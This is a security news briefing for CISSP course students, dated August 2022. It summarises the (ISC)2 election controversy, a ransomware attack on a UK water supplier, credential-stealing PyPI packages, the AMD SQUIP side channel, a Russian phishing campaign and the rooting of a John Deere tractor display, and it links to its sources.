Les Bell

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories

(ISC)2 Election Process Criticised

As mentioned in a previous news brief, the election for the Board of Directors at (ISC)² continues to draw criticism from members. In a post to the (ISC)² Community discussion board, member Stephen Mencik, along with Wim Remes and Diana Contesti, point out some glaring flaws in the process:

• The Board apparently changed the process for nomination after the election was announced.
• This change was not announced to the membership.
• Nevertheless 85 people submitted nominations to run, but
  
• The Board reviewed these nominations, and then selected five candidates to run for the five open seats.

In effect, says Mencik, this means that the Board decided the election result with no reference to the membership. Concerned certification holders (are we really members?) might want to have their say.

Mencik, Stephen, post in thread "Petition to be on the ballot for the 2022 ISC2 Board of Directors Election", (ISC)2 Community discussion board, 16 August 2022. Available online at https://community.isc2.org/t5/Welcome/Petition-to-be-on-the-Ballot-for-the-2022-ISC2-Board-of/m-p/52476/highlight/true#M2084.

Ransomware Operators Hit UK Water Supplier

A ransomware group known as Clop claimed to have hit the largest UK water supplier, Thames Water. In response Thames Water issued a statement via its website stating that it had not suffered a cyber-attack, and instead South Staffordshire PLC, operator of South Staffs Water and Cambridge Water, confirmed that it had been the victim of the attack. The company revealed that its corporate network had been affected, but that its water supply operations were not compromised.

Despite Clop's misfire, this is continuing evidence that ransomware gangs are keen to exploit critical infrastructure operations, further eroding resilience at a time of drought and water shortages.

Montalbano, Elizabeth, U.K. Water Supplier Hit with Clop Ransomware Attack, ThreatPost, 16 August 2022. Available online at https://threatpost.com/water-supplier-hit-clop-ransomware/180422/.

PyPI Supply-Chain Attacks - Python Packages Target Discord, Roblox

Kaspersky, Snyk and Checkpoint have found multiple trojaned Python packages in PyPI, the Python Package Index repository. The trojan code uses a variety of techniques; for example, a package examined by Checkpoint used code in the _init_.py file of the setup script to download and run a script which would search for and exfiltrate local passwords.

The latest discoveries include 12 distinct pieces of malware belonging to the same actor, and uses PyInstaller to bundle a malicious application and its dependencies into one package which is then distributed via the Discord content delivery network, from where it infiltrates user browsers. It then exfiltrates passwords, cookies, web history and other data which the attackers can use to pivot to other targets using the stolen credentials.

The references below provide a lot of technical detail, but the overall message is that even more effort is required in the area of supply chain security.

Bezcershenko, Leonid and Igor Kuznetsov, Two more malicious Python packages in the PyPI, Kaspersky SecureList, 16 August 2022. Available online at https://securelist.com/two-more-malicious-python-packages-in-the-pypi/107218/.

Suero, Kyle and Raul Onitza-Klugman, Snyk finds PyPI malware that steals Discord and Roblox credential and payment info, Snyk blog, 16 August 2022. Available online at https://snyk.io/blog/pypi-malware-discord-roblox-credential-payment-info/.

Uncredited, CloudGuard Spectral detects several malicious packages on PyPI - the official software repository for Python developers, Checkpoint Research, 8 August 2022. Available online at https://research.checkpoint.com/2022/cloudguard-spectral-detects-several-malicious-packages-on-pypi-the-official-software-repository-for-python-developers/.

Another Hardware Vulnerability in AMD processors

In another brief, we mentioned the ÆPIC vulnerability which affects Intel's SGX security architecture. Now comes news of yet another hardware vulnerability, CVE-2021-46778, which impacts AMD Zen 1, Zen 2 and Zen 3 architecture processors. The SQUIP (Scheduler Queue Usage via Interference Probing) attack is a side channel attack that threat actors could use to recover RSA keys. AMD has issued a bulletin, but no easy fix is available.

Gast, Stefan, et. al., SQUIIP: Exploiting the Scheduler Queue Contention Side Channel, preprint, August 2022. Available online at https://stefangast.eu/papers/squip.pdf.

Uncredited, Execution Unit Scheduler Contention Side-Channel Vulnerability on AMD Processors, AMD product security bulletin, 12 August 2022. Available online at https://www.amd.com/en/corporate/product-security/bulletin/amd-sb-1039.

Russian APT Phishes Defence, Intelligence, Academics

Microsoft has been tracking an espionage campaign it labels SEABORGIUM, apparently involving an APT variously known as Callisto, COLDRIVER and TA446. The campaign targets defence and intelligence consulting firms, thinktanks and academics, primarily in the US, UK, Nordic and Baltic states, and Eastern Europe, using phishing and credential theft techniques.

The campaign is highly targeted, using fake personas on social media to send innocuous emails and establish trust before sending a weaponized message containing or linking to a trojaned PDF file, which is hosted on Microsoft OneDrive.

Lakshamanan, Ravie, Microsoft Warns About Phishing Attacks by Russia-linked Hackers, The Hacker News, 16 August 2022. Available online at https://thehackernews.com/2022/08/microsoft-warns-about-phishing-attacks.html.

Aussie Roots Tractor

Continuing the Right-To-Repair debate, an Asia-based Australian security researcher showed DEFCON attendees how to get privileged access to the CANBUS display of a John Deere 4240 tractor. John Deere is much criticised for blocking access to their tractors' control systems, making repairs possible only via authorised dealers. It took researcher SickCodes a lot of expensive experimentation to finally break the Linux-based display, but in the end it was embarrassingly easy: he simply created an empty file called dealerAuth.txt on a USB memory stick inserted into the system.

Saarinen, Juha, Oh Deere: Aussie researcher roots tractor control system, IT News, 16 August 2022. Available online at https://www.itnews.com.au/news/oh-deere-aussie-researcher-roots-tractor-control-system-584004.

These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License.